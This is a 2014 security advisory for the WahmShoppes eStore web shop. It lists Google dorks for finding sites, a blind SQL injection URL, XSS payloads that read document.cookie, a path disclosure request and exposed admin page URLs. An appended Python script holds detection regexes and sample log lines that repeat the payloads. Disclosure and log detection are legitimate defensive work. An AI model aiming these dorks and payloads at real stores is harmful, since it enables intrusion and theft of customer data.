WahmShoppes eStore Multiple Vulnerability

2014.06.06
Credit: alieye
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : multiple Vulnerability in "WahmShoppes eStore"
# Author : alieye
# vendor : http://www.wahmshoppes.com/
# Contact : cseye_ut@yahoo.com
# Risk : High
# Class: Remote
# Google Dork:
# inurl:WsError.asp
# inurl:store/ We apologize but your request rendered no results
# Version: all version
# Date: 05/06/2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

1-Blind SQL Injection
http://victim.com/store/WsDefault.asp?One=-999 AND 1=1+UNION+SELECT+...etc
---------------------------------------------------------
2-Cross Site Scripting
http://victim.com/store/WsError.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://victim.com/store/WsRequestpwd.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
---------------------------------------------------------
3-Information Disclosure in image location
http://victim.com/store/thumb.asp?path=X:/server path and domain name/example.jpg
---------------------------------------------------------
4-show admin panel tools
http://victim.com/store/frmLeft.asp
---------------------------------------------------------
Admin page
http://victim.com/store/admin/Default.asp

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
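
For store operators reviewing their own web logs, the request shapes listed in items 1 to 4 can be matched as below. This is an added example, not part of the original advisory or the vendor's code; the "METHOD URI STATUS" log format, the rule labels, and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

XSS = re.compile(r"<\s*script|\bon\w+\s*=|javascript:", re.I)
SQLI = re.compile(r"\bunion\b.*\bselect\b|\b(and|or)\b\s+\d+\s*=\s*\d+", re.I)
ABS_PATH = re.compile(r"^[a-z]:[\\/]", re.I)  # drive-letter path, as in item 3

# (label, script name, query parameter or None, pattern on the decoded value)
# Labels are hypothetical names chosen for this example.
RULES = [
    ("sqli-One", "wsdefault.asp", "one", SQLI),
    ("xss-msg", "wserror.asp", "msg", XSS),
    ("xss-msg", "wsrequestpwd.asp", "msg", XSS),
    ("thumb-absolute-path", "thumb.asp", "path", ABS_PATH),
    # Any hit on frmLeft.asp is listed so it can be checked against admin sessions.
    ("frmLeft-request", "frmleft.asp", None, None),
]

def classify(uri):
    """Return the sorted rule labels matched by one request URI."""
    parts = urlsplit(uri)
    script = parts.path.rsplit("/", 1)[-1].lower()
    # parse_qsl percent-decodes values and turns '+' into a space
    params = [(k.lower(), v) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    hits = set()
    for label, name, param, pattern in RULES:
        if script != name:
            continue
        if param is None or any(k == param and pattern.search(v) for k, v in params):
            hits.add(label)
    return sorted(hits)

def scan(lines):
    """Return (line_number, labels) for every log line that matches a rule."""
    found = []
    for number, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) >= 2 and (labels := classify(fields[1])):
            found.append((number, labels))
    return found

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    "GET /store/WsDefault.asp?One=12 200",
    "GET /store/WsDefault.asp?One=-999+AND+1=1+UNION+SELECT+1 500",
    "GET /store/WsError.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 200",
    "GET /store/WsRequestpwd.asp?msg=Password+sent 200",
    "GET /store/thumb.asp?path=X:/inetpub/example.jpg 200",
    "GET /store/frmLeft.asp 200",
]
```

Matches on `thumb-absolute-path` show the store is emitting server paths in image URLs; matches on `frmLeft-request` need correlating with authenticated admin sessions before treating them as suspicious.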



Copyright 2024, cxsecurity.com